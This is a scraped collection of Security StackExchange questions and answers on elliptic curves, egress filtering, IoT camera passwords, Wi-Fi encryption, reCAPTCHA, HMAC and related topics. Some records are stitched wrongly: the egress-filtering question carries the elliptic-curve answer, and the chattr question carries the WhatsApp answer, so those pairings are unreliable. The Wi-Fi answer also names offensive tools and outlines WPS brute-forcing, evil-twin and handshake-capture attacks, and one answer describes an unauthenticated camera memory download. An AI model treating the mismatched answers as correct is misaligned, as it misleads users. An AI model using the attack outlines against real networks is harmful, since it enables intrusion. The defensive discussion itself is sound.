wap-wsg-idm-ecid-wtls10: NIST/SECG/WTLS curve over a 233 bit binary field
wap-wsg-idm-ecid-wtls11: NIST/SECG/WTLS curve over a 233 bit binary field
wap-wsg-idm-ecid-wtls12: WTLS curvs over a 224 bit prime field
Oakley-EC2N-3:
IPSec/IKE/Oakley curve #3 over a 155 bit binary field.
Not suitable for ECDSA.
Questionable extension field!
Oakley-EC2N-4:
IPSec/IKE/Oakley curve #4 over a 185 bit binary field.
Not suitable for ECDSA.
Questionable extension field! Could a kind cryptographer point out to me which curves are still considered safe? | You are misreading Bernstein and Lange's advice (admittedly, their presentation is a bit misleading, with the scary red "False" tags). What they mean is not that some curves are inherently unsafe, but that safe implementation of some curves is easier than for others (e.g. with regards to library behaviour when it encounters something which purports to be the encoding of a valid curve point, but is not). What you really want is a curve such that: the software which you will entrust with your private key (your SSL server) is properly implemented and will not leak details about your private key; interoperability will be achieved. For a SSL server certificate, an "elliptic curve" certificate will be used only with digital signatures (ECDSA algorithm). The server will sign only messages that it generates itself; and, in any case, the only "private" operation involving a curve in ECDSA is multiplication of the conventional base point (hardcoded, since it is part of the curve definition, hence correct) by a random value that the server generates. Therefore, in your use case, there is no risk of private key leakage that would be specific to the used curve. If your SSL implementation is poor, it will be poor for all curves, not for just some of them. "Interoperability" means that you would probably prefer it if SSL clients can actually connect to your server; otherwise, having a SSL server would be rather pointless. This simplifies the question a lot: in practice, average clients only support two curves, the ones which are designated in so-called NSA Suite B : these are NIST curves P-256 and P-384 (in OpenSSL, they are designated as, respectively, "prime256v1" and "secp384r1"). If you use any other curve, then some widespread Web browsers (e.g. Internet Explorer, Firefox...) will be unable to talk to your server. Use P-256 to minimize trouble. If you feel that your manhood is threatened by using a 256-bit curve where a 384-bit curve is available, then use P-384: it will increases your computational and network costs (a factor of about 3 for CPU, a few extra dozen bytes on the network) but this is likely to be negligible in practice (in a SSL-powered Web server, the heavy cost is in "Web", not "SSL"). | {
"source": [
"https://security.stackexchange.com/questions/78621",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6822/"
]
} |
78,630 | Suppose your Aunt or Uncle is easily fooled by phishing attempts and their computer has multiple root kits and key loggers running. Assume their computing habits will never change. Looking at his wireless router you can see that he only visits a few dozen or a few hundred websites multiple times in a month. Instead of trying to keep the bad guys out, set up the firewall's default outbound rule to be block (deny/reject) everything to prevent the bad guys from getting out. If this non-technical relative had a simple python program running with an ssh connection into the firewall, the program could monitor the IP addresses as they get blocked. The program would then ask the user if they want to access 72.21.211.176 Amazon.com (USA). If the user says yes, the program might then ask: Allow outbound access to all 72.21. . networks? This is an attempt to save some time creating a whitelist. I know opinions vary as to the value of egress filtering. But with all the technology advances in the last 20 years, I find it frustrating that there is not a simple way for non-technical users to prevent sending data to that village in Wales (Llanfairpwllgwyngyll) that we all know is full of nation state hackers. http://en.wikipedia.org/wiki/Llanfairpwllgwyngyll Since I am more of a SQL developer than a security expert, I am posting this to see if this would realistically help secure the home network in the example above. Of course the solution is not perfect, but it seems like it would help. This thought came about after reading about DGA malware that have been known to create thousands of new domains per second and realizing that attackers are way more sophisticated than I imagined. http://en.wikipedia.org/wiki/Domain_generation_algorithm UPDATE As both answers indicate, this is not a good way to approach the problem. Too many IPs in the world and the user can't be trusted to allow only safe domains. | You are misreading Bernstein and Lange's advice (admittedly, their presentation is a bit misleading, with the scary red "False" tags). What they mean is not that some curves are inherently unsafe, but that safe implementation of some curves is easier than for others (e.g. with regards to library behaviour when it encounters something which purports to be the encoding of a valid curve point, but is not). What you really want is a curve such that: the software which you will entrust with your private key (your SSL server) is properly implemented and will not leak details about your private key; interoperability will be achieved. For a SSL server certificate, an "elliptic curve" certificate will be used only with digital signatures (ECDSA algorithm). The server will sign only messages that it generates itself; and, in any case, the only "private" operation involving a curve in ECDSA is multiplication of the conventional base point (hardcoded, since it is part of the curve definition, hence correct) by a random value that the server generates. Therefore, in your use case, there is no risk of private key leakage that would be specific to the used curve. If your SSL implementation is poor, it will be poor for all curves, not for just some of them. "Interoperability" means that you would probably prefer it if SSL clients can actually connect to your server; otherwise, having a SSL server would be rather pointless. This simplifies the question a lot: in practice, average clients only support two curves, the ones which are designated in so-called NSA Suite B : these are NIST curves P-256 and P-384 (in OpenSSL, they are designated as, respectively, "prime256v1" and "secp384r1"). If you use any other curve, then some widespread Web browsers (e.g. Internet Explorer, Firefox...) will be unable to talk to your server. Use P-256 to minimize trouble. If you feel that your manhood is threatened by using a 256-bit curve where a 384-bit curve is available, then use P-384: it will increases your computational and network costs (a factor of about 3 for CPU, a few extra dozen bytes on the network) but this is likely to be negligible in practice (in a SSL-powered Web server, the heavy cost is in "Web", not "SSL"). | {
"source": [
"https://security.stackexchange.com/questions/78630",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64795/"
]
} |
78,684 | This question has a follow-up question here: How to securely encrypt data with a public-private key encryption scheme, but also allow decryption if the private key is lost? TL;DR: Can I use plaintext passwords for a device which doesn't hold any sensitive data? No, because password reuse. Okay, can I use prehashed passwords for a device which doesn't hold any sensitive data? No, because database administrators can still use the prehashed passwords to gain access. Then what can I use? As far as I'm aware, plaintext passwords are not secure. Yet I don't see a way around using them. I have two questions: In the following situation, is the use of plaintext passwords insecure? In the following situation, is the use of plaintext passwords unavoidable? We're developing new cameras to be used for monitoring and security of private homes. I'll skip their uses, but they're intended not just as security cameras against things like break-ins, but also for other domestic uses (like checking if your children are still in bed, and not wandering about in the evening). The security plan is as such: Each camera has a (likely to be unique) default password. The password is generated per camera, but duplicates are possible. We store the default passwords in a database for support (both testing and "you lost your default password card, but do have a receipt of purchase, here's your default password"). Each camera is reachable from anywhere in the world with minimum set-up. With the default password, one can access the camera and change the password. With a custom password, one can access the camera and view the stream of the camera. The default password is rejected if a custom password is set. The default password does not allow viewing of the camera stream. With physical access to the camera, it's possible to factory reset the camera. This clears the custom password and reinstates the default password. So far, I personally do not see any security issues. Yes, we store plaintext passwords, but they do not allow access on configured cameras. They only allow access on cameras that are plugged in but not yet configured. It would take a mighty scanner to detect and take over a camera that was just plugged in, but not configured yet. Even if it was taken over, the customer could just factory reset the device and try again. Now, for the next change... We wish to simplify the accessing of the cameras over multiple devices (tablet, phone, PC?). To do this, we store the custom password in our database. When one wishes to access their camera, they log in to our platform (this password we do not store plaintext). They can retrieve a list of cameras and plaintext passwords. They can then use these passwords to connect to the camera. The handling of the plaintext passwords happens automatically in an app, but with a rooted device, it should be easy to find out what data you're receiving. We store custom passwords in the database too. Custom passwords are retrieved after authenticating to the platform (via properly managed credentials). Custom passwords are stored per user; if two people add the same camera to their account with the same password, it will work. If one of them then changes the password on the camera, the other one will get a "enter password" dialog the next time they try to access the camera. Storing these passwords plaintext, it suddenly becomes possible, in the event of a database breach, to access all configured cameras from anywhere. Is this a security risk? The worst one can do is format the SD card (and control the camera like any other PTZ camera). One could even start the update process, but all that would do is install updates from the update server(s). Unless you're nearby the camera to intercept traffic and alter the received firmware, the camera will just update to our latest version. If an attacker has physical access to the device, it doesn't matter what security we have; they could factory reset, set up their own password, then update from SD card. Result is a camera that can do anything it damn well pleases. I'm willing to allow a successful (unrecoverable takeover; e.g. bricking of the camera) hack attempt only by physical access. This because we cannot make the cameras resistant to weaponry - if someone can destroy a camera with good use of a hammer, protecting against physical attack vectors is a moot point. In the described situation, is the use of plaintext passwords insecure? In the described situation, is the use of plaintext passwords unavoidable? EDIT: A suggestion that has been to made is to make custom passwords hashed. This removes a risk that in the event of a database breach, people would be suffering access breaches via password reuse. @Victor pointed out that the current security plan allows employees to access the cameras. Removal of the password synchronization feature allows us to remove the password from the database, removing the security risk. However, we wish to make an online video storage service to allow video playback in event of camera theft. This requires a camera password of sorts. Passing this password and storing it in a database opens the situation back up for employees using the passwords in the database to access customer cameras. A new plan I'm thinking of involves having the customer using the app to, via a local connection with the camera, generate an access token that allows, from anywhere, but only with a specific account (of which only the company knows the password), access to the video feed only. This allows such an online video storage service. However, it also allows use of this access token and the special account to, once again, access the camera feed. And we're back at a security risk. I don't know how to solve this... EDIT: By combining all of your suggestions (many thanks), I was able to draft a new security plan. To prevent moving the goal posts, I have created a new question for this: How to securely encrypt data with a public-private key encryption scheme, but also allow decryption if the private key is lost? | It's a long question but I think your main point is this: We wish to simplify the accessing of the cameras over multiple devices (tablet, phone, PC?). First have a look how SSH keys work. That would work for you mostly as it is. At first the customers public key is added into his camera during the initial configuration. He can authenticate himself using his private key that is stored on his device. Every of his devices (PC, Tablet, Mobile, ...) has its own key. If he likes to access his camera from a new device, he starts a request from this device with the public key from his device. Goes back to his first device and grant the request by adding the public key into the camera. From now both clients can access. You can revoke access by removing a key. Also you can store access levels with the key. You can store all public keys on your server. If you server gets hacked, only public keys can be stolen. All the cameras are still secure. If a customer gets hacked, he revokes his public key on your server, performs a factory reset on his cameras and adds his new key. | {
"source": [
"https://security.stackexchange.com/questions/78684",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55685/"
]
} |
78,758 | What additional security can a "password minimum age" provide? For example: the user can change their password only after 24 hours have elapsed since the last password change. | It is normally used in conjunction with a setting to prevent re-use of X number of previous passwords - the minimum password age is intended to discourage users from cycling through their previous passwords to get back to a preferred one. Obviously the effectiveness is dependent on both the minimum password age setting and the users. | {
"source": [
"https://security.stackexchange.com/questions/78758",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/65968/"
]
} |
78,802 | What could be the threats of having the ports open, after performing a nmap scan and identifying the open ports? I already searched for some answers for this question, but couldn't find anything specific. Is there any particular issue with each and every port or are those threats common for all of them? | An open port is an attack surface. The daemon that is listing on a port, could be vulnerable to a buffer overflow, or another remotely exploitable vulnerability. An important principle in security is reducing your attack surface, and ensure that servers have the minimum number of exposed services. | {
"source": [
"https://security.stackexchange.com/questions/78802",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66002/"
]
} |
78,807 | Google has released a new form of captcha identification of bots, that asks the user to click a single checkbox. It uses image-based verification only if necessary. Could someone please explain to me as to how such a program differentiates a human from a bot? There is a program here that can perform mouse clicks on your computer. It can not be detected by a web-based program with no access to your program files. It should be possible to write an undetectable Windows executable that can tick the check box. One could also randomize the response time of the program. After a few (successful) attempts, the captcha will ask for image verification. Maybe that can be solved by an AI that searches the images using Google Image Search (by image), and makes guesses based on the filenames of 'visually similar' images. If the images used are not from the net, then they would be limited in number, and one could create a database of them. Could someone clarify whether these approaches could actually work? | This isn't really a great question for stackexchange as Google is keeping its algorithms secret so all we can really do is make guesses about how it works, but my understanding is that the new system will analyze your activity across all of Google's services (and possibly other sites that Google has some control over, such as websites that have Google ads). Thus, it is likely that the checks are not limited to just the page that has the checkbox on it. For example, if they detect that your computer/IP address you are using was also used in the past to do things that a normal human would do - things like checking Gmail, searching on Google search, uploading files to Drive, sharing photos, browsing the web etc. - then it can probably be reasonably sure that you are a human and allow you to skip the image verification. On the other hand, if it can't associate your computer with any previous human-like activity, then it would be more suspicious and give you the image verification. Though the mouse behavior as it clicks the checkbox may be one factor it analyzes, there is almost certainly a lot more to it. Again, we don't know for sure how it works. This is just my best guess based on what little Google has said: While the new reCAPTCHA API may sound simple, there is a high degree
of sophistication behind that modest checkbox. CAPTCHAs have long
relied on the inability of robots to solve distorted text. However,
our research recently showed that today’s Artificial Intelligence
technology can solve even the most difficult variant of distorted text
at 99.8% accuracy. Thus distorted text, on its own, is no longer a
dependable test. To counter this, last year we developed an Advanced Risk Analysis
backend for reCAPTCHA that actively considers a user’s entire
engagement with the CAPTCHA—before, during, and after—to determine
whether that user is a human. This enables us to rely less on typing
distorted text and, in turn, offer a better experience for users. We
talked about this in our Valentine’s Day post earlier this year. To me the point about "before, during, and after use" is a strong hint that they analyze previous browsing behavior, but my interpretation could be wrong. Here's a quote from WIRED: Instead of depending upon the traditional distorted word test,
Google’s “reCaptcha” examines cues every user unwittingly provides: IP
addresses and cookies provide evidence that the user is the same
friendly human Google remembers from elsewhere on the Web. And Shet
says even the tiny movements a user’s mouse makes as it hovers and
approaches a checkbox can help reveal an automated bot. There is another thread on stackoverflow discussing this as well: https://stackoverflow.com/questions/27286232/how-does-new-google-recaptcha-work As for image verification, you're not going to be able to find those images with reverse image search, or compile a database of them. They are usually random street signs or house numbers captured by Google's Street View cars, or words from books that were scanned for the Google Books project. There is a good purpose behind this - Google actually makes use of what people type into reCaptcha to improve their own databases and train OCR algorithms. reCaptcha gives the same image to a number of users, and if they all agree on what it says, then the picture becomes training data for Google's AI. From wikipedia: The reCAPTCHA service supplies subscribing websites with images of
words that optical character recognition (OCR) software has been
unable to read. The subscribing websites (whose purposes are generally
unrelated to the book digitization project) present these images for
humans to decipher as CAPTCHA words, as part of their normal
validation procedures. They then return the results to the reCAPTCHA
service, which sends the results to the digitization projects. reCAPTCHA has worked on digitizing the archives of The New York Times
and books from Google Books.[3] As of 2012, thirty years of The New
York Times had been digitized and the project planned to have
completed the remaining years by the end of 2013. The now completed
archive of The New York Times can be searched from the New York Times
Article Archive, where more than 13 million articles in total have
been archived, dating from 1851 to the present day. | {
"source": [
"https://security.stackexchange.com/questions/78807",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64646/"
]
} |
79,070 | Slightly old news: Whatsapp Just Switched on End-to-End Encryption for Hundreds of Millions of Users Is there any test that I can perform to verify that WhatsApp is indeed using end-to-end encryption between my and another Android phone? | There isn't any quick check you can perform in order to be sure that end-to-end encryption is used. Even if you manage to get this confirmation, then you have to make sure that the used encryption keys never left your device (and the device of your friend). If end-to-end encryption is used, but WhatsApp or someone else has access to the encryption keys, the chat is no longer confidential. There is some available information which can allow a security researcher to start investigating the matter: The encryption software is known and the code is open source (even if we do not know what changes were made to the WhatsApp implementation) WhatsApp will integrate the open-source software Textsecure, created by privacy-focused non-profit Open Whisper Systems, which scrambles messages with a cryptographic key that only the user can access and never leaves his or her device TextSecure GitHub P.S.: There is at least one way to tell if they are not using end-to-end encryption and parsing the contents of your messages. Some time ago, a security researcher discovered that URLs sent in Skype messages are accessed from Microsoft IP addresses ( link ). You can try the same thing by setting up a web server and sending some unique URLs on WhatsApp. | {
"source": [
"https://security.stackexchange.com/questions/79070",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/35368/"
]
} |
79,072 | Recently, a website I hosted (a wordpress site) for a friend got hacked and all php pages had added code at the bottom in the form of echo base64_encode(...); . Thus there were unwanted ads on very page. The webserver is apache2 running suphp. I imagine a recursive chattr +i on all php files that don't need to be modified/upload by a website would protect against such an attack. Am I right to believe this and would there be any good reason not to do this? | There isn't any quick check you can perform in order to be sure that end-to-end encryption is used. Even if you manage to get this confirmation, then you have to make sure that the used encryption keys never left your device (and the device of your friend). If end-to-end encryption is used, but WhatsApp or someone else has access to the encryption keys, the chat is no longer confidential. There is some available information which can allow a security researcher to start investigating the matter: The encryption software is known and the code is open source (even if we do not know what changes were made to the WhatsApp implementation) WhatsApp will integrate the open-source software Textsecure, created by privacy-focused non-profit Open Whisper Systems, which scrambles messages with a cryptographic key that only the user can access and never leaves his or her device TextSecure GitHub P.S.: There is at least one way to tell if they are not using end-to-end encryption and parsing the contents of your messages. Some time ago, a security researcher discovered that URLs sent in Skype messages are accessed from Microsoft IP addresses ( link ). You can try the same thing by setting up a web server and sending some unique URLs on WhatsApp. | {
"source": [
"https://security.stackexchange.com/questions/79072",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22264/"
]
} |
79,187 | What is the best home wireless network encryption algorithm to use? I realize the best answer will probably change over time, and hopefully people can provide updated answers as new standards come out. So far, my knowledge, as of early 2015 is: WEP - Horrible / outdated, but still a bit better than nothing (or may even be worse than nothing because it provides a false sense of security as pointed out below). WPA - Provides some security, but probably better to go with WPA2. WPA2 - Pretty good (especially with AES encryption), but still not perfect. It is the best I know though for a home network. Are there any better encryption standards to use than WPA2 for a home wireless network, or is that the best there is? If it is the best there is, is it easy to hack? If it is true as others indicate that WPA-2 is not adequate, and nothing better exists, it seems like it would be a good idea, perhaps even a good money making opportunity for someone to develop something better! Edit (July 1, 2019): WPA3 is now a better option than WPA2. | From a security perspective, I think you are asking the wrong question. WPA2 is the basic answer. But it's entirely incomplete! A more complete answer will view WPA2 as one component of your wireless network defence. Of course there's strong encryption methods using certificates/vpn etc but these are too difficult for most people to set up and are usually reserved for businesses. So let's assume WPA-2 is the 'best' answer to the basic question. However... as you'll see, there's many weaker points that attackers go for, that ultimately reveal your WPA2 password, so I've included them in the points below. I'm assuming many people will land on this page and see answers saying
'yeah just use a good password and WPA2 encryption', which is bad
advice. Your WPA2 network is still completely vulnerable, as you
will see: the main thing you can do, is be the hardest person to hack around you. That's the biggest deterrent. If I'm going to hack you, but you're taking too long or are too expensive to crack , I'll try the next person. This will require some playing around in your router settings. I'll assume you would never use WEP . 10 minutes on youtube and your mom can crack it. Switch off WPS. this is EXTREMELY vulnerable to brute force attacks and can be hacked in seconds, even if you are using WPA2 with a ridiculously complex password . Tools like reaver and revdk3 or bully make light work of these. You're only a little bit more protected if your router supports rate-limiting, which slows down, but doesn't prevent brute force attacks against your routers pin. Better to be safe and just switch WPS off and be 100% safe against these attacks. turn off remote access , DMZ, UPNP, unecessary port forwarding turn on, any inbuilt intrusion detection systems, MAC address filtering (tedious to set up if visitors to your house want access to your wifi (you will have to add your friends device to the router's MAC white-list to enable access) This can be hacked by faking a MAC address easily, and getting your MAC is also easy with an airodump-ng scan, but nevertheless, this will slow down attackers , requires them to be near a client device (mobile phone, or laptop in the whitelist) It will be pretty effective against some remote attacks. have a very long, non-human, complex password. If you have ever tried to decrypt a password you'll know that it gets exponentially harder to crack a password the more complex, less predictable and longer it is. If your password even remotely resembles a word, or something that could probably be a set of words (see: markov chains) you are done. Also don't bother adding numbers to the end of passwords, then a symbol... these are easily hacked with a dictionary attack with rules that modify the dictionary to flesh it out to cover more passwords. This will take each word or words in the dictionary, and add popular syntax and structures, such as passwords that look like this 'capital letter, lowercase letters, some numbers then a symbol. Cat111$, Cat222# or whatever the cracker wants. These dictionaries are huge, some can be investigated on crackstation or just have a look at Moxie Marlinspikes' cloudcrackr.com. The goal here is to be 'computationally expensive'. If you cost too much to crack using ultra high speed cloud based cracking computers then you're safe against almost anyone. So ideally you want to use the maximum 64 characters for your password, and have it look like the most messed up annoying symbol infused piece of incoherent upper-lower-case dribble you've ever seen. You'll probably be safe after 14 characters though, there's quite a bit of entropy here, but it's far easier to add characters than it is to decrypt. change your routers default password and SSID . nobody does this, but everyone should. It's literally the dumbest thing. Also, don't get lazy. and don't keep the router's model number in the SSID, that's just asking for trouble. update your router's firmware. Also, if your router is old. throw it out and buy a newer one, because it's likely your router is on some website like routerpwn.com/ and you've already lost the battle. Old routers are full of bugs, can be easily denial-of-serviced, don't usually have firewalls or intrusion detection systems and don't usually have brute-force WPS rate limiting among other things. just get a new one. learn about evil-twin hacks . The easiest way to protect against this is to stop your device from auto-connecting. However, this might still snag you. Become familiar with software like wiphishing and airbase-ng, these apps clone your router, then Denial of service your router making your device connect to the attackers cloned router, allowing them to intercept your traffic. They'll usually try to phish the WPA2 password from you here. You're safer from these attacks if you actually know what your router's web console looks like , because the default phishing pages that come with these types of apps are usually pretty old looking, however a sophisticated attacker can create a good landing page. Put simply, if your 'router' ever wants you to type in a password don't type it! You'll only ever be asked when you are creating the password, when you specifically log in to the 192.168.0.1 or 10.1.1.1 user interface, then you are being phished and it's game over. To prevent this attack you could also artificially reduce the range of your router. pull out the antenna's and create a little faraday cage around it, leaving a small area that points to your most ideal wifi position. Alternatively, just use a cable to your laptop or computer until the attacker gives up. handshake attacks are pretty popular, this is where the attacker sends a deauthorisation packet to anyone connected to your router using your password, then when that device (say an iPhone) tries to reconnect, it captures the '4 way handshake' which let's the device and router authenticate using your WPA2 password. This is what hackers use to crack offline using the password attacks in point 6. However if you have used a strong password (as described in point 6) then you've mitigated this attack already . So i've focussed on router based defence, but there's actually even easier ways to be attacked. If the attacker knows who you are, you're screwed. With a tiny bit of social engineering , they can find your facebook your email or some other way to contact you and insert some malicious snippet of code that's invisible and hijack your entire computer, which therefore lets them simply check the wifi settings in your computer and obtain the ultra strong password you've spent so long making. One popular method is to send you an email that's junk, and keep sending it until you click unsubscribe, as you usually would for junk mail, except this link is exactly the worst thing to do. You've broken the cardinal law of email. Don't click links in emails. If you have to click one, at least check where it goes first. If someone has access to any of your devices, or plugs/gets your to plug a device into your laptop, you're gone. things like usb sticks 'usb rubber ducky' can compromise your computer and reveal your WPA2 password to a relatively novice hacker. if you use a wireless keyboard, and you live near an attacking neighbour , they can use things like keysweeper to compromise your wifi, and a lot more. This could be creatively used with an evil twin attack to increase the likelihood you type your password (it listens to wireless keyboard signals). The way to prevent this attack is to not use a wireless microsoft keyboard. There's plenty of other ways, and you'll never prevent them all, but usually if your router is locked down , has a nice password, has WPS off, WPA2 on, a strong (new) router with a password, no remote-web access, unnecessary ports are closed, MAC filtering is used and intrusion detection in the router is switched on you will usually prevent even pretty dedicated attackers. They'll have to try harder methods and will probably just give up. | {
"source": [
"https://security.stackexchange.com/questions/79187",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47692/"
]
} |
79,275 | Thomas Pornin has stated in the past on multiple occasions (I'm not going to source them, he can argue with me if he wants) that humans are bad RNGs. While I agree that human RNG for password generation in the mind is abysmal usually, I wanted to ask if human-aided RNG by a computer is equally as bad. KeePass has a feature where you seed the RNG by moving the mouse for a while, and while I know that if KeePass is using /dev/urandom it's more or less secure enough, I've used the mouse-seeded RNG in the past. I've always thought that RNG aided by human input would be better than just standard PRNG as provided by an operating system. How could someone predict exactly how I'd move my mouse, at what rate, how often I'm pausing, etc.? | Human brains are poor RNG. People are bad at generating random values in the privacy of their heads. They just cannot think randomly; though they can convince themselves that they do. Physical process, on the other hand, are rather good sources of entropy. Take your mouse movements. A few dozen times per second, the mouse measures how far it has moved since the last tick, and sends that information to the server. When your hand shakes, it tends to do so somewhat regularly, but biology is such that each elementary move will be subject to some jitter, which happens to be substantially bigger than the precision of the mouse; even with a lot of training, it is very hard for a human hand to do the exact same move repeatedly (otherwise there would be a lot more people like Yehudi Menuhin ). So the bottom line is that mouse movement measures contain some entropy. (Remember that "entropy" is here defined as "that which the attacker does not know"; the mouse certainly knows how much it has moved, since it is that mouse that actually sends the values on which the RNG are built.) The other half of the answer is aggregation . A mouse-based RNG will use hundreds or even thousands of measures, accumulate them all and condensate them into an appropriate seed that will concentrate all that entropy. This is simple enough: simply feed all the values to a cryptographic hash function, e.g. SHA-256, and you will get a 256-bit seed that has all the source entropy, wherever it was hiding in the measured mouse movements. Hash functions are good for that; they reduce the size but keep the entropy (up to the hash function output size, but 256 bits is more than enough for all purposes). An attacker may guess that the user will do circles, but will have a hard time getting all the individual movements right, especially since psychology won't help him: the human user himself has no idea how his hand movements are turned into numbers. Since we are talking about hundreds of numbers, the number of possible combinations (i.e. "entropy") raises exponentially. Contrast that with a human user thinking about a new password: the user will choose letters following some inner "witty" train of thought, that the attacker can guess more or less brutally (e.g. if the letters are all the first letters of some words in a sentence from a book, the attacker can automatically try all sentences from all books he can find in electronic format); and, more importantly, the human user won't be bothered to produce more than a dozen or so of "seemingly random" characters. In passwords, length does not make strength -- but lack of length can be quite effective at preventing strength. | {
"source": [
"https://security.stackexchange.com/questions/79275",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2374/"
]
} |
79,316 | So I'm looking into public WiFi security in places such as hotels, coffee shops etc. It seems the current standard is just to use open wi fi connections in many of these locations. I would assume this is for a number of reasons: Simple for the company - the provider does not need to train their workers in basic network security, don't need to manage keys or anything really, just plug the router in and go. Also costs the company less because of this. Convenient for the user - the user doesn't have to concern themselves with trivial things like security, they just want to get straight to their online banking and shopping in a public place! Ignorance - the person adding the free WiFi simply has no idea of the security risks involved, or they are dumping the responsibility of security onto the user, it's their data/money/identity after all So, first question. In your experience, is it true that most coffee shops, hotels, airports typically use an open connection, or are protected networks more commonplace now? If it is the case that most are unprotected, are there any other reasons as to why this is the case, beyond the ones above that I've listed? Second question, assume a coffee shop with an open network, all traffic is extremely easy to sniff. Now picture the establishment upgrades it to WPA2/AES secured network. Is the network really that more secure? Sure attackers can no longer easily sniff the network from down the street, but how hard is it for them to go in, buy a coffee and get the current key. Even assuming the keys are changed daily, repeats are never used, and they are complex enough to take months to crack, any attacker could just buy a coffee and connect to the network right? Or even get the key through social engineering, or just get a friend to get a coffee and the key. I understand that WEP, WPA2 etc. all do encryption at a network (as opposed to user) level of granularity. I.e. if someone has the key, they can now decrypt all traffic on the network, so we're back to the problem that an attacker can read all traffic as if it was an open network, and it's already proven to be trivial to get the key. So, with this in mind, is an unlocked encrypted network equivalent to an open network? What sort of attacks could a hacker do on a WPA2 secured network? Could you do a man in the middle attack as easily as on an open network? Is it possible to create a rogue AP with the SSID and key, advertised with the same encryption standard, as possible with the open network? Thanks for reading this lengthy post, and thanks in advance for answers to any of my three questions! | Instead of continuing in the comments, I think I will just answer your real question, which I understand to be - why is using WPA/WPA2 Personal with a public SSID and Passphrase not more secure than having an open network, and why doesn't WPA/WPA2 Enterprise work in the coffee shop scenario. If the passphrase was public (as it would be in this scenario) and WPA/WPA2 personal is in use, anybody who has the passphrase and SSID name can decrypt anybody else's wireless traffic, as long as they can capture the initial 4-way handshake for that client (which occurs when connecting to the network). If someone wants to decrypt someone's future traffic but did not monitor their client's initial 4-way handshake, they can simply force a new handshake between that client and the AP using a targeted deauthentication, at which point you would be able to capture the new 4-way handshake and decrypt all of their future traffic. Of course, if the client under attack were to use a VPN, SSH tunnel, TLS, or some other strong encryption mechanism over the wireless, that traffic would be protected to the extent that the mechanism that they chose allows. The reason why their traffic can be decrypted is that WPA/WPA2 personal creates a pairwise master key from the passphrase and SSID used when logging in. The PMK is then used to create a Pairwise Transient Key and Groupwise Temporal key, where the PTK is unique per client and the GTK is shared for all currently connected clients (for broadcast traffic). This PTK can be derived from the PMK using information from the 4-way handshake (which is negotiated in plain text). Therefore, if you are able to sniff the 4-way handshake, you can get the information used to derive that client's PTK from the PMK that you already know because you know the passphrase and SSID (usually by doing PBKDF2(Passphrase, SSID, ssidlen, 4096, 256)). WPA enterprise doesn't work well because everyone would need a way to authenticate, whether credentials (EAP-PEAP), certificate (EAP-TLS), or other (various other EAP modes), and this wouldn't support the coffee shop's goal of providing free wireless access to nearby individuals. | {
"source": [
"https://security.stackexchange.com/questions/79316",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66421/"
]
} |
79,544 | I have an https website that is protected by a login form (username + password). Does it add anything, protection wise, if I put this website behind a firewall that only allow certain IP address? | Yes, locking your service down by IP will prevent your service being found by the general internet population and will dramatically reduce the attack surface if managed correctly. This will make your site safer from not just brute force attacks - your whole application will be "invisible". Despite this fact, locking down IPs should not be done in lieu of other measures such as ensuring your web application and server is secure from other vulnerabilities - if one of your "good IPs" is compromised, an attacker could use this as a pivot in order to attack your site. Also be aware that any malware running by any of your trusted users could be used by an attacker to bypass the IP restriction. So use it as an extra layer of security, but do not let this trick you into a false sense of security where you let your guard down. Treat your web application and platform as if it was fully internet visible - regularly scan and test it for vulnerabilities, and make sure that the management of allowed IP addresses is done properly by deleting and updating and verifying on a regular basis. | {
"source": [
"https://security.stackexchange.com/questions/79544",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/50051/"
]
} |
79,577 | Is there anything different about how secure these two hashing algorithms are? Does HMAC "fuse" the data and the key in a special way that's more security-aware? | Yes, HMAC is more complex than simple concatenation. As a simplistic example, if you were to simply concatenate key + data, then "key1"+"data" yields identical results to "key"+"1data", which is suboptimal. HMAC will yield different results for each. There are other flaws with simple concatenation in many cases, as well; see cpast's answer for one. The specification for HMAC is called RFC2104 , which you should read if you have this level of interest. In summary, to implement HMAC, you should first: Create "ipad", which is 0x36 repeated BLOCKSIZE times.
Create "opad", which is 0x5c repeated BLOCKSIZE times. Note that BLOCKSIZE is 64 bytes for MD5, SHA-1, SHA-224, SHA-256, and 128 bytes for SHA-384 and SHA-512, per RFC2104 and RFC4868 . Then HMAC is defined as: HASH(Key XOR opad, HASH(Key XOR ipad, text)) or, in detail from the RFC, (Pretext: The definition of HMAC requires a cryptographic hash function, which
we denote by H, and a secret key K. We assume H to be a cryptographic
hash function where data is hashed by iterating a basic compression
function on blocks of data. We denote by B the byte-length of such
blocks.) (1) append zeros to the end of K to create a B byte string
(e.g., if K is of length 20 bytes and B=64, then K will be
appended with 44 zero bytes 0x00)
(2) XOR (bitwise exclusive-OR) the B byte string computed in step
(1) with ipad
(3) append the stream of data 'text' to the B byte string resulting
from step (2)
(4) apply H to the stream generated in step (3)
(5) XOR (bitwise exclusive-OR) the B byte string computed in
step (1) with opad
(6) append the H result from step (4) to the B byte string
resulting from step (5)
(7) apply H to the stream generated in step (6) and output
the result | {
"source": [
"https://security.stackexchange.com/questions/79577",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66642/"
]
} |
79,642 | I am about to move in a new house, and I would like to install some security cameras. The contractor told me that in order for me to check the videos recorded by the cameras in real time when I am away I'll need to have a static IP address. Are there problems with it? Is it less secure? I am not a billionaire or famous so it is unlikely there will be targeted attacks. On the other hand it would be my home network and it'll happen that I'll input my bank credentials sooner or later, so I want it to be safe. | Static or dynamic IP is a non-issue. But since you brought up cameras, you should know that many IP cameras have VERY poor security. Many of these cameras have a known bad firmware in them that allows unauthenticated download of the entire memory of the device via simply going to /proc/kcore, without the need to authenticate. This allows anyone to obtain the password for your camera. http://www.tripwire.com/state-of-security/vulnerability-management/vulnerability-who-is-watching-your-ip-camera/ | {
"source": [
"https://security.stackexchange.com/questions/79642",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25305/"
]
} |
